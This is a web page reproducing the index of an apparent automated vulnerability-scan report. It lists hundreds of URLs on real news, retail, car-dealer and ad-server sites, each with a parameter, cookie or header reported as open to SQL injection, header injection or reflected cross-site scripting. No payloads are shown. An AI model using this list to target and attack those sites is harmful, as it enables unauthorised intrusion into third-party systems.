Cross Site Scripting Reports | Hoyt LLC Research

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [REST URL parameter 3]

1.3. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]

1.4. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]

1.5. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ [REST URL parameter 2]

1.6. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ [REST URL parameter 2]

1.7. http://blogs.mercurynews.com/kawakami/ [REST URL parameter 1]

1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

1.9. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

1.10. http://blogs.mercurynews.com/warriors/ [Referer HTTP header]

1.11. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200125.xml [REST URL parameter 3]

1.12. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 1]

1.13. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 4]

1.14. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 2]

1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 3]

1.16. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]

1.17. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200733.xml [REST URL parameter 4]

1.18. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200736.xml [REST URL parameter 4]

1.19. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200738.xml [REST URL parameter 4]

1.20. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 3]

1.21. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 4]

1.22. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200743.xml [REST URL parameter 3]

1.23. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200744.xml [REST URL parameter 4]

1.24. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 1]

1.25. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 4]

1.26. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 4]

1.27. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 5]

1.28. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 1]

1.29. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 4]

1.30. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 5]

1.31. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 1]

1.32. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 5]

1.33. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200750.xml [REST URL parameter 4]

1.34. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 3]

1.35. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 4]

1.36. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200754.xml [REST URL parameter 1]

1.37. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200756.xml [REST URL parameter 4]

1.38. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 1]

1.39. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 4]

1.40. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 3]

1.41. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 4]

1.42. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200760.xml [REST URL parameter 3]

1.43. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 1]

1.44. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 5]

1.45. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 3]

1.46. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 4]

1.47. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 5]

1.48. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200769.xml [REST URL parameter 4]

1.49. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 1]

1.50. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 4]

1.51. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200774.xml [REST URL parameter 3]

1.52. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200775.xml [REST URL parameter 5]

1.53. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 1]

1.54. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 4]

1.55. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200777.xml [REST URL parameter 1]

1.56. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200778.xml [REST URL parameter 4]

1.57. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200779.xml [REST URL parameter 3]

1.58. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200781.xml [REST URL parameter 1]

1.59. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 1]

1.60. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 3]

1.61. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 1]

1.62. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 4]

1.63. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200784.xml [REST URL parameter 1]

1.64. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200785.xml [REST URL parameter 1]

1.65. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 1]

1.66. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 4]

1.67. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200789.xml [REST URL parameter 3]

1.68. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 3]

1.69. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 4]

1.70. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 3]

1.71. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 4]

1.72. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200902.xml [REST URL parameter 3]

1.73. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200906.xml [REST URL parameter 3]

1.74. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 1]

1.75. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 4]

1.76. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200908.xml [REST URL parameter 4]

1.77. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200909.xml [REST URL parameter 4]

1.78. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200910.xml [REST URL parameter 1]

1.79. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 1]

1.80. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 3]

1.81. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200912.xml [REST URL parameter 3]

1.82. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200913.xml [REST URL parameter 4]

1.83. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200914.xml [REST URL parameter 4]

1.84. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200915.xml [REST URL parameter 3]

1.85. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 1]

1.86. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 3]

1.87. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200917.xml [REST URL parameter 1]

1.88. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200918.xml [REST URL parameter 1]

1.89. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 1]

1.90. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 2]

1.91. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200923.xml [REST URL parameter 4]

1.92. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200924.xml [REST URL parameter 3]

1.93. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200925.xml [REST URL parameter 4]

1.94. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200927.xml [REST URL parameter 4]

1.95. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200929.xml [REST URL parameter 4]

1.96. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200930.xml [REST URL parameter 1]

1.97. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200934.xml [REST URL parameter 1]

1.98. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 1]

1.99. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 4]

1.100. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200936.xml [REST URL parameter 4]

1.101. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200939.xml [REST URL parameter 4]

1.102. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200946.xml [REST URL parameter 3]

1.103. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200950.xml [REST URL parameter 4]

1.104. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200952.xml [REST URL parameter 3]

1.105. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200953.xml [REST URL parameter 1]

1.106. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200956.xml [REST URL parameter 4]

1.107. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 3]

1.108. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 4]

1.109. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200960.xml [REST URL parameter 4]

1.110. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 1]

1.111. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 4]

1.112. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/210701.xml [REST URL parameter 3]

1.113. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 4]

1.114. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 5]

1.115. http://metrics.carpricesecrets.com/b/ss/cvencarpricesecrets/1/H.16/s75690248599275 [REST URL parameter 3]

1.116. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 1]

1.117. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 3]

1.118. http://open.ad.yieldmanager.net/a1 [conTy2 parameter]

1.119. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]

1.120. http://open.ad.yieldmanager.net/a1 [sltId2 parameter]

1.121. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

1.122. http://tap.rubiconproject.com/oz/sensor [au cookie]

1.123. http://tap.rubiconproject.com/oz/sensor [cd cookie]

1.124. http://tap.rubiconproject.com/oz/sensor [cd parameter]

1.125. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.126. http://tap.rubiconproject.com/oz/sensor [put_1986 cookie]

1.127. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

1.128. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

1.129. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 1]

1.130. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 2]

1.131. http://www.carpricesecrets.com/mercury [t_mtype parameter]

1.132. http://www.contracostatimes.com/california/ci_16783052 [Referer HTTP header]

1.133. http://www.contracostatimes.com/ci_16759989 [Referer HTTP header]

1.134. http://www.contracostatimes.com/ci_16774009 [UserType cookie]

1.135. http://www.contracostatimes.com/ci_16790597 [EMETA_COOKIE_CHECK_MNGI cookie]

1.136. http://www.contracostatimes.com/ci_16790963 [fPage cookie]

1.137. http://www.contracostatimes.com/ci_16790963 [s_sq cookie]

1.138. http://www.contracostatimes.com/ci_16791142 [Referer HTTP header]

1.139. http://www.contracostatimes.com/ci_16792343 [currBrandCheck cookie]

1.140. http://www.contracostatimes.com/ci_16792616 [u cookie]

1.141. http://www.contracostatimes.com/news/ci_16783847 [User-Agent HTTP header]

1.142. http://www.contracostatimes.com/news/ci_16791147 [EMETA_COOKIE_CHECK_MNGI cookie]

1.143. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]

1.144. http://www.contracostatimes.com/news/ci_16792343 [nclick_check parameter]

1.145. http://www.contracostatimes.com/samesexmarriage/ci_16792108 [source parameter]

1.146. http://www.facebook.com/logout.php [campaign_click_url cookie]

1.147. http://www.fremonttoyota.com/AF2/milapi/0.2/mil.php [confid parameter]

1.148. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [User-Agent HTTP header]

1.149. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [__utma cookie]

1.150. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 1]

1.151. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 1]

1.152. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [__utmb cookie]

1.153. http://www.fremonttoyota.com/Toyota/Sequoia/ [Referer HTTP header]

1.154. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 1]

1.155. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [Referer HTTP header]

1.156. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [__utmb cookie]

1.157. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [Referer HTTP header]

1.158. http://www.fremonttoyota.com/Toyota/Venza/ [BIGipServerAPACHE_DEV cookie]

1.159. http://www.fremonttoyota.com/Toyota/Venza/ [Referer HTTP header]

1.160. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]

1.161. http://www.fremonttoyota.com/inventory.php [__utmc cookie]

1.162. http://www.fremonttoyota.com/quick-quote.html [REST URL parameter 1]

1.163. http://www.fremonttoyota.com/search/CPO+t [__utmz cookie]

1.164. http://www.fremonttoyota.com/search/New+Toyota+tm [__utmb cookie]

1.165. http://www.legacy.com/services/obitrss.asp [Source parameter]

1.166. http://www.linkatopia.com/ [Referer HTTP header]

1.167. http://www.linkatopia.com/ [User-Agent HTTP header]

1.168. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]

1.169. http://www.mercurynews.com/49ers/ci_16794130 [fPage cookie]

1.170. http://www.mercurynews.com/action-line/ci_16799546 [Zvents cookie]

1.171. http://www.mercurynews.com/bay-area-living/ci_16790631 [name of an arbitrarily supplied request parameter]

1.172. http://www.mercurynews.com/breaking-news/ci_16799837 [Referer HTTP header]

1.173. http://www.mercurynews.com/breaking-news/ci_16799883 [__g_c cookie]

1.174. http://www.mercurynews.com/breaking-news/ci_16800002 [name of an arbitrarily supplied request parameter]

1.175. http://www.mercurynews.com/business/ci_16792615 [Referer HTTP header]

1.176. http://www.mercurynews.com/business/ci_16792615 [User-Agent HTTP header]

1.177. http://www.mercurynews.com/business/ci_16792615 [UserID cookie]

1.178. http://www.mercurynews.com/business/ci_16792615 [name of an arbitrarily supplied request parameter]

1.179. http://www.mercurynews.com/business/ci_16799883 [__qca cookie]

1.180. http://www.mercurynews.com/business/ci_16799883 [u cookie]

1.181. http://www.mercurynews.com/business/ci_16799954 [Referer HTTP header]

1.182. http://www.mercurynews.com/california-high-speed-rail/ci_16793216 [name of an arbitrarily supplied request parameter]

1.183. http://www.mercurynews.com/celebrities/ci_16800030 [Zvents cookie]

1.184. http://www.mercurynews.com/celebrities/ci_16800030 [__g_u cookie]

1.185. http://www.mercurynews.com/celebrities/ci_16800030 [s_cc cookie]

1.186. http://www.mercurynews.com/ci_16761580 [currBrandCheck cookie]

1.187. http://www.mercurynews.com/ci_16791927 [JSESSIONID cookie]

1.188. http://www.mercurynews.com/ci_16791927 [UserID cookie]

1.189. http://www.mercurynews.com/ci_16791927 [__g_u cookie]

1.190. http://www.mercurynews.com/ci_16791927 [name of an arbitrarily supplied request parameter]

1.191. http://www.mercurynews.com/ci_16794599 [source parameter]

1.192. http://www.mercurynews.com/ci_16794599 [u cookie]

1.193. http://www.mercurynews.com/ci_16797127 [UserID cookie]

1.194. http://www.mercurynews.com/ci_16797127 [name of an arbitrarily supplied request parameter]

1.195. http://www.mercurynews.com/ci_16797127 [s_cc cookie]

1.196. http://www.mercurynews.com/ci_16797755 [Referer HTTP header]

1.197. http://www.mercurynews.com/ci_16797755 [Referer HTTP header]

1.198. http://www.mercurynews.com/ci_16797755 [currBrandCheck cookie]

1.199. http://www.mercurynews.com/college-sports/ci_16785433 [u cookie]

1.200. http://www.mercurynews.com/college-sports/ci_16785923 [UserType cookie]

1.201. http://www.mercurynews.com/college-sports/ci_16793572 [UserID cookie]

1.202. http://www.mercurynews.com/college-sports/ci_16793572 [__g_c cookie]

1.203. http://www.mercurynews.com/college-sports/ci_16793572 [fPage cookie]

1.204. http://www.mercurynews.com/college-sports/ci_16793572 [u cookie]

1.205. http://www.mercurynews.com/college-sports/ci_16793781 [Referer HTTP header]

1.206. http://www.mercurynews.com/college-sports/ci_16793781 [s_sq cookie]

1.207. http://www.mercurynews.com/college-sports/ci_16793781 [source parameter]

1.208. http://www.mercurynews.com/college-sports/ci_16795084 [User-Agent HTTP header]

1.209. http://www.mercurynews.com/college-sports/ci_16795084 [UserID cookie]

1.210. http://www.mercurynews.com/college-sports/ci_16795084 [__g_u cookie]

1.211. http://www.mercurynews.com/college-sports/ci_16795084 [__qca cookie]

1.212. http://www.mercurynews.com/college-sports/ci_16795084 [currBrandCheck cookie]

1.213. http://www.mercurynews.com/columns/ci_16799883 [Zvents cookie]

1.214. http://www.mercurynews.com/crime-courts/ci_16792429 [Referer HTTP header]

1.215. http://www.mercurynews.com/crime-courts/ci_16792429 [UserID cookie]

1.216. http://www.mercurynews.com/crime-courts/ci_16792429 [__g_c cookie]

1.217. http://www.mercurynews.com/crime-courts/ci_16800051 [UserType cookie]

1.218. http://www.mercurynews.com/entertainment/ci_16753906 [__g_u cookie]

1.219. http://www.mercurynews.com/entertainment/ci_16753906 [fPage cookie]

1.220. http://www.mercurynews.com/entertainment/ci_16777054 [Referer HTTP header]

1.221. http://www.mercurynews.com/entertainment/ci_16799215 [name of an arbitrarily supplied request parameter]

1.222. http://www.mercurynews.com/entertainment/ci_16800206 [Zvents cookie]

1.223. http://www.mercurynews.com/giants/ci_16745927 [s_sq cookie]

1.224. http://www.mercurynews.com/giants/ci_16755841 [Zvents cookie]

1.225. http://www.mercurynews.com/giants/ci_16755841 [fcspersistslider1 cookie]

1.226. http://www.mercurynews.com/giants/ci_16755841 [name of an arbitrarily supplied request parameter]

1.227. http://www.mercurynews.com/giants/ci_16755841 [u cookie]

1.228. http://www.mercurynews.com/giants/ci_16765848 [s_cc cookie]

1.229. http://www.mercurynews.com/giants/ci_16785859 [User-Agent HTTP header]

1.230. http://www.mercurynews.com/giants/ci_16793528 [Zvents cookie]

1.231. http://www.mercurynews.com/giants/ci_16793528 [__g_u cookie]

1.232. http://www.mercurynews.com/giants/ci_16793528 [source parameter]

1.233. http://www.mercurynews.com/high-school-sports/ci_16780570 [currBrandCheck cookie]

1.234. http://www.mercurynews.com/high-school-sports/ci_16780570 [name of an arbitrarily supplied request parameter]

1.235. http://www.mercurynews.com/high-school-sports/ci_16781152 [fPage cookie]

1.236. http://www.mercurynews.com/high-school-sports/ci_16781473 [JSESSIONID cookie]

1.237. http://www.mercurynews.com/high-school-sports/ci_16781501 [JSESSIONID cookie]

1.238. http://www.mercurynews.com/high-school-sports/ci_16781501 [source parameter]

1.239. http://www.mercurynews.com/high-school-sports/ci_16792321 [Referer HTTP header]

1.240. http://www.mercurynews.com/nation-world/ci_16796747 [Referer HTTP header]

1.241. http://www.mercurynews.com/nation-world/ci_16797757 [UserID cookie]

1.242. http://www.mercurynews.com/news/ci_16800002 [Referer HTTP header]

1.243. http://www.mercurynews.com/opinion/ci_16791987 [currBrandCheck cookie]

1.244. http://www.mercurynews.com/opinion/ci_16792028 [UserID cookie]

1.245. http://www.mercurynews.com/opinion/ci_16792028 [fPage cookie]

1.246. http://www.mercurynews.com/opinion/ci_16792028 [fcspersistslider1 cookie]

1.247. http://www.mercurynews.com/opinion/ci_16792028 [s_cc cookie]

1.248. http://www.mercurynews.com/opinion/ci_16798841 [Referer HTTP header]

1.249. http://www.mercurynews.com/scott-herhold/ci_16765193 [s_cc cookie]

1.250. http://www.mercurynews.com/sharks/ci_16778369 [Referer HTTP header]

1.251. http://www.mercurynews.com/sharks/ci_16778369 [__qca cookie]

1.252. http://www.mercurynews.com/sharks/ci_16778369 [fcspersistslider1 cookie]

1.253. http://www.mercurynews.com/sharks/ci_16779655 [Referer HTTP header]

1.254. http://www.mercurynews.com/sharks/ci_16779655 [User-Agent HTTP header]

1.255. http://www.mercurynews.com/sharks/ci_16779655 [UserID cookie]

1.256. http://www.mercurynews.com/sharks/ci_16779655 [__g_c cookie]

1.257. http://www.mercurynews.com/sharks/ci_16785264 [REST URL parameter 1]

1.258. http://www.mercurynews.com/sharks/ci_16794268 [UserType cookie]

1.259. http://www.mercurynews.com/sharks/ci_16794268 [source parameter]

1.260. http://www.mercurynews.com/sharks/ci_16794268 [u cookie]

1.261. http://www.mercurynews.com/sharks/ci_16795056 [fPage cookie]

1.262. http://www.mercurynews.com/tim-kawakami/ci_16739351 [User-Agent HTTP header]

1.263. http://www.mercurynews.com/tim-kawakami/ci_16755984 [UserID cookie]

1.264. http://www.mercurynews.com/tim-kawakami/ci_16755984 [Zvents cookie]

1.265. http://www.mercurynews.com/tim-kawakami/ci_16755984 [source parameter]

1.266. http://www.mercurynews.com/tim-kawakami/ci_16755984 [u cookie]

1.267. http://www.mercurynews.com/tim-kawakami/ci_16781111 [UserType cookie]

1.268. http://www.mercurynews.com/tim-kawakami/ci_16781111 [currBrandCheck cookie]

1.269. http://www.mercurynews.com/tim-kawakami/ci_16793240 [source parameter]

1.270. http://www.mercurynews.com/warriors/ci_16780373 [UserID cookie]

1.271. http://www.mercurynews.com/warriors/ci_16781614 [Referer HTTP header]

1.272. http://www.mercurynews.com/warriors/ci_16781614 [currBrandCheck cookie]

1.273. http://www.mercurynews.com/warriors/ci_16786557 [REST URL parameter 1]

1.274. http://www.mercurynews.com/warriors/ci_16792619 [User-Agent HTTP header]

1.275. http://www.mercurynews.com/warriors/ci_16792619 [UserID cookie]

1.276. http://www.mercurynews.com/warriors/ci_16792619 [UserType cookie]

1.277. http://www.mercurynews.com/warriors/ci_16792619 [UserType cookie]

1.278. http://www.mercurynews.com/warriors/ci_16792619 [__g_c cookie]

1.279. http://www.mercurynews.com/warriors/ci_16792619 [__g_u cookie]

1.280. http://www.mercurynews.com/warriors/ci_16794092 [UserID cookie]

1.281. http://www.mercurynews.com/warriors/ci_16794092 [Zvents cookie]

1.282. http://www.mercurynews.com/warriors/ci_16794092 [fPage cookie]

1.283. http://www.mercurynews.com/weird-news/ci_16784172 [fPage cookie]

1.284. https://www.starbucks.com/account/partneracct/IDMLogin [name of an arbitrarily supplied request parameter]

1.285. https://www.starbucks.com/card/manage/check-your-balance [User-Agent HTTP header]

1.286. https://www.starbucks.com/card/rewards/card-rewards-canada [Referer HTTP header]

1.287. https://www.starbucks.com/card/rewards/program-information [User-Agent HTTP header]

1.288. https://www.starbucks.com/card/starbucks-gold [.SbuxAuth cookie]

1.289. http://www.ucsc-extension.edu/sites/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 1]

1.290. http://www.ucsc-extension.edu/video/guy-kawasaki [name of an arbitrarily supplied request parameter]

2. XPath injection

3. HTTP header injection

3.1. http://redacted/ad/N3550.288595.MNG.COM/B5040651.75 [REST URL parameter 1]

3.2. http://redacted/adi/N3753.BayAreaNewsGroup-NNN/B4496828.10 [REST URL parameter 1]

3.3. http://redacted/adj/mdm.aolcreatives/DiabetesAds [REST URL parameter 1]

3.4. http://redacted/adj/mercurynews.com/targetweekly [REST URL parameter 1]

3.5. http://redacted/jump/N3550.288595.MNG.COM/B5040651.75 [REST URL parameter 1]

3.6. http://redacted/jump/contracostatimes.com/targetweekly [REST URL parameter 1]

3.7. http://redacted/jump/mercurynews.com/ [REST URL parameter 1]

3.8. http://redacted/jump/mercurynews.com/targetweekly [REST URL parameter 1]

3.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.10. http://www.mtgeinfo.com/sjmn/ [REST URL parameter 1]

3.11. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]

4. Cross-site scripting (reflected)

4.1. http://ap.feeds.theplatform.com/ps/getRSS [CustomBoolean|isNational|true&query parameter]

4.2. http://ap.feeds.theplatform.com/ps/getRSS [PID parameter]

4.3. http://ap.feeds.theplatform.com/ps/getRSS [endIndex parameter]

4.4. http://ap.feeds.theplatform.com/ps/getRSS [query parameter]

4.5. http://ap.feeds.theplatform.com/ps/getRSS [startIndex parameter]

4.6. http://bid.openx.net/json [c parameter]

4.7. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ [REST URL parameter 18]

4.8. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ [REST URL parameter 4]

4.9. http://courses.ucsc-extension.edu/ucsc/public/category/courseDetails.do [selectedProgramStreamId parameter]

4.10. http://dean.edwards.name/base/forEach.js [REST URL parameter 1]

4.11. http://dean.edwards.name/base/forEach.js [REST URL parameter 1]

4.12. http://dean.edwards.name/base/forEach.js [REST URL parameter 2]

4.13. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 1]

4.14. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 1]

4.15. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 4]

4.16. http://dean.edwards.name/weblog/2005/10/add-event/ [name of an arbitrarily supplied request parameter]

4.17. http://event.adxpose.com/event.flow [uid parameter]

4.18. http://events.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

4.19. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]

4.20. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]

4.21. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

4.22. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [REST URL parameter 1]

4.23. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [REST URL parameter 2]

4.24. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [name of an arbitrarily supplied request parameter]

4.25. http://forums.contracostatimes.com/poll [REST URL parameter 1]

4.26. http://forums.contracostatimes.com/poll [name of an arbitrarily supplied request parameter]

4.27. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]

4.28. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]

4.29. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]

4.30. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]

4.31. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]

4.32. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]

4.33. http://gmtrx.com/tracking202/static/landing.php [lpip parameter]

